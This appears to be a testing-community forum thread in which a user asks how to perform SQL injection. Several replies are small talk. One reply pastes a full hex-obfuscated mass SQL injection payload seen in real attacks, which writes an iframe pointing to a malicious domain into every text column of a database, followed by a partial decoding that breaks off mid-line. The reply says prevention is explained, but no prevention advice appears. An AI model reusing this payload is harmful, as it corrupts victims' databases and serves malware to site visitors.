Quality Testing

Quality is delighting customers

How to perform SQL Injection? I have no idea about this so please help me to perform this.

Thanks & Regards,
Nistha

Views: 296

Reply to This

Replies to This Discussion

Hii All...

Thanks a lot for replies.. I'll go through all provided material and get back to you all again with new questions.. :)
Ohh...so you were in V2Solutins ha?
yupp.. n think i have seen u der... :) :)
ohh ....i am not able to recall you....where you were sitting ?
Hey Try this out as well

Last month we have seen almost 200 defaced system with following SQL injection code. Prevention is explained as well.

It has been observed that Mass SQL Injection attack spreading in the wild by injecting iframe into websites similar to the Asprox botnet methodology. The attack is designed to inject an iframe into the website source which will force visitors to download a javascript file from the domain malicious remote domains.

The injected SQL strings are obfuscated with HEX strings.

declare%20@s%20varchar(4000);set%20@s=cast(0x64456
34c417245204054207661526368615228323535292c4063207
64152434841722832353529206465634c417265207461624c4
55f635572734f5220435552534f5220466f522053454c45437
420412e6e616d652c622e6e614d652066726f4d207379734f6
26a6543747320612c737973434f4c754d4e732062207768655
24520612e69643d422e696420614e4420412e58745950653d2
7552720616e642028622e78545950653d3939206f7220622e5
8547970653d3335206f5220422e78545950653d323331204f5
220622e78747970453d31363729206f50454e205441624c655
f637552736f72206645544348206e6558542046524f6d20546
1426c455f437552734f7220494e744f2040542c40632077686
96c4528404046657443685f7374417475533d3029206265474
96e20657845632827557044615445205b272b40742b275d205
36554205b272b40632b275d3d727452494d28434f4e5665525
428564152434841722834303030292c5b272b40432b275d292
92b63615354283078334336393636373236313644363532303
73337323633334432323638373437343730334132463246364
53635364436463638373536393643363436393639364532453
73237353246373436343733324636373646324537303638373
03346373336393634334433313232323037373639363437343
63833443232333032323230363836353639363736383734334
43232333032323230373337343739364336353344323236343
63937333730364336313739334136453646364536353232334
53343324636393636373236313644363533452061532076615
2434861722831303629292729204645544368204e657874206
6526f6d207441426c655f635572734f7220496e744f2040742
c406320456e4420436c6f7365207461626c455f437552736f5
2206445414c4c6f43415465205461424c655f435552736f722
0%20as%20varchar(4000));exec(@s);--

The decoded strings can be normalized in a more readable form:

dEClarE @T Varchar(4000);

DEClare @c VarChar(255)

DeCLaRe tablE_CursOR cUrSOr foR foR

SELEcT [A].NAmE,[b].naME

fROM sYsoBJEcTs [A],sysColUMns [B]

WHeRE A.Id=b.Id ANd

a.xtyPe='U' /*table( User defined)*/ aNd

b.xtYpe=99 oR B.xtype=35 OR

b.xTypE=231 OR

B.XtypE=167

OPEn tABLe_CursoR feTCh NEXT fROm tAble_cUrsor INTO @t,@C

whIle(@@fETCh_StaTUs=0)

BEGIn

eXEc('UpdAte ['+@T+'] sET ['+@C+']=rTrim(conVERt(vaRCHar(4000),['+@c+']))+caSt(
Attachments:

RSS

TTWT Magazine


Advertisement

Advertisement

Advertisement

Advertisement

© 2021   Created by Quality Testing.   Powered by

Badges  |  Report an Issue  |  Terms of Service